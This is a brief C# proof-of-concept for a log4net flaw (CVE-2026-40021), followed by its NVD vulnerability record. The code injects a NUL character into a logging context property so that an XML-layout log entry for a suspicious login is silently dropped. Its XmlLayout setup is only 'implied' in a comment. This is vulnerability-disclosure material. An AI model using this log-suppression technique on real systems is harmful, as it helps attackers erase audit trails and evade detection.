CVE-2026-40021

/* * PoC for CVE-2026-40021 * Demonstrates log suppression by injecting invalid XML characters into MDC. */ using log4net; using log4net.Config; using System; namespace PoC_CVE_2026_40021 { class Program { private static readonly ILog log = LogManager.GetLogger(typeof(Program)); static void Main(string[] args) { // Configure Log4net with XmlLayout (implied configuration) BasicConfigurator.Configure(); // XML 1.0 forbidden character (e.g., NULL character 0x00) string forbiddenChar = Convert.ToChar(0x00).ToString(); string maliciousInput = " malicious_activity" + forbiddenChar; // Inject into MDC (Mapped Diagnostic Context) LogicalThreadContext.Properties["user_data"] = maliciousInput; // This log event will trigger an exception during XML serialization // and will be silently dropped/lost. log.Warn("Suspicious login attempt detected"); Console.WriteLine("PoC executed: Check logs for missing entry."); } } }

{"cve": {"id": "CVE-2026-40021", "sourceIdentifier": "[email protected]", "published": "2026-04-10T16:16:32.420", "lastModified": "2026-04-22T14:13:45.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache Log4net's XmlLayout https://logging.apache.org/log4net/manual/configuration/layouts.html#layout-list and XmlLayoutSchemaLog4J https://logging.apache.org/log4net/manual/configuration/layouts.html#layout-list , in versions before 3.3.0, fail to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets in MDC property keys and values, as well as the identity field that may carry attacker-influenced data. This causes an exception during serialization and the silent loss of the affected log event.\n\nAn attacker who can influence any of these fields can exploit this to suppress individual log records, impairing audit trails and detection of malicious activity.\n\nUsers are advised to upgrade to Apache Log4net 3.3.0, which fixes this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:log4net:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.3.0", "matchCriteriaId": "DCD2F9E8-684B-4B34-B48B-32E8225631F3"}]}]}], "references": [{"url": "https://github.com/apache/logging-log4net/pull/280", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://lists.apache.org/thread/q8otftjswhk69n3kxslqg7cobr0x4st7", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://logging.apache.org/cyclonedx/vdr.xml", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://logging.apache.org/log4net/manual/configuration/layouts.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://logging.apache.org/security.html#CVE-2026-40021", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/10/11", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}